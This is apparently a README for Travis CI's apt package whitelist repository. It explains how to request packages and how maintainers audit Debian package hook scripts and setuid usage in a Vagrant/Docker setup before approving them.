This repo contains plain text files for the packages approved for installation in restricted build environments,
specifically meant for use with the apt_packages
addon in
travis-build.
- Check the list of approved packages for your build environment (most likely
ubuntu-precise
). - If it's not in there, check for existing issues requesting the package you
want, and if one doesn't exist please
open an issue requesting the package you need in the primary issues
repo
(and be sure to replace
__PACKAGE__
in the issue title 😉). - Please be patient 😺
The approval process is mostly about ensuring the .deb
installation hooks don't do anything malicious or goofy that
would open up a container to potential attack from a neighbor. The primary concern is protecting Travis CI customers
and their property 🤘. The steps go like this (for ubuntu precise), much of which is also available as the
travis-download-deb-sources
executable within the vagrant box:
- Bring up the vagrant box:
vagrant up precise
- SSH into the vagrant box:
vagrant ssh precise
- Start the Travis Ruby container:
sudo -u ubuntu -i docker run -v /var/tmp:/var/tmp -d travis:ruby
- Get the container's IP address:
docker inspect <container-id>
- SSH into the container:
ssh travis@<container-ip>
(password=travis
) - Freshen up the apt cache:
sudo apt-get update
- Move into the shared dir or sub directory, e.g.:
mkdir -p /var/tmp/deb-sources ; cd /var/tmp/deb-sources
- Grab the package sources:
apt-get source <package-name>
- Take a look at the package's extracted hooks:
cd <package-name>/debian ; vim *pre* *post* *inst*
(see inspecting packages) - If no malicious or goofy bits are found, 👍 e.g.:
make add PACKAGE=<package-name>
Or the slightly simplified version:
- Bring up the vagrant box:
vagrant up precise
- SSH into the vagrant box:
vagrant ssh precise
- Run the
travis-download-deb-sources
script for the package in question, e.g.:sudo -u ubuntu -i travis-download-deb-sources git
- Proceed with inspecting the
debian/*pre*
anddebian/*post*
hook scripts. (see inspecting packages)
All together now, for poppler-utils
:
# inside the vagrant box
sudo -u ubuntu -i -- travis-download-deb-sources poppler-utils
cd /var/tmp/shared/deb-sources/poppler-0.18.4/debian
vi *{pre,post,inst}*
# either inside the vagrant box in /vagrant or outside in the repo top level
make add PACKAGE=poppler-utils
git commit -v
The big things to worry about are if any of the debian hook scripts are doing malicious or silly things, or if the
package being installed depends on setuid
or setgid
.
# move into the `deb-sources` directory
pushd /var/tmp/shared/deb-sources
# look for `setuid`, `seteuid`, and `setgid` usage, except for mentions in `install-sh`
grep -l -R -i -E 'set(uid|euid|gid)' . | grep -v -E '\binstall-sh\b'
# if the above `grep` finds anything, take a closer look:
vi $(grep -l -R -i -E 'set(uid|euid|gid)' . | grep -v -E '\binstall-sh\b')
# move into the `debian` directory
pushd $(find . -name debian | head -1)
# take a look at the hook scripts and such
shopt -s nullglob
vi *{pre,post,inst}*
There is a helper script at ./bin/travis-list-apt-whitelist-issues
which may be used to query the open APT whitelist
requests, as well as for automatic commit message formatting, e.g.:
# list everything
./bin/travis-list-apt-whitelist-issues
# Show only the generated commit messages
./bin/travis-list-apt-whitelist-issues | jq -r .commit_message
First things first
shopt -s nullglob
Grab 1 or more packages
for pkg in abc def xyz ; do
sudo -u ubuntu -- /usr/local/bin/travis-download-deb-sources "${pkg}" ;
done
Edit any matches for set(uid|euid|gid|egid)
vim $(grep -l -R -i -E 'set(uid|euid|gid)' . | grep -v -E '\binstall-sh\b')
Edit any debian package files
for d in $(find . -name debian) ; do
pushd $d && vim *{pre,post,inst}* ; popd ;
done
If all clear, list all audited package names on one line
for d in $(find . -name debian) ; do
pushd $d &>/dev/null && \
grep ^Package control | awk -F: '{ print $2 }' | xargs echo ;
popd &>/dev/null ;
done | xargs echo
Back outside of the Vagrant box, pass this list of packages for addition
for pkg in abc def xyz ; do
make add PACKAGE=$pkg ;
done
Grab the generated commit message
./bin/travis-list-apt-whitelist-issues | jq -r '.commit_message' | grep -A2 abc
Commit and push, then restart all travis-build
apps with a bit o' sleep
for app in $(hk apps | awk '/travis.*build-(prod|stag)/ { print $1 }') ; do
hk restart -a ${app} ;
sleep 5 ;
done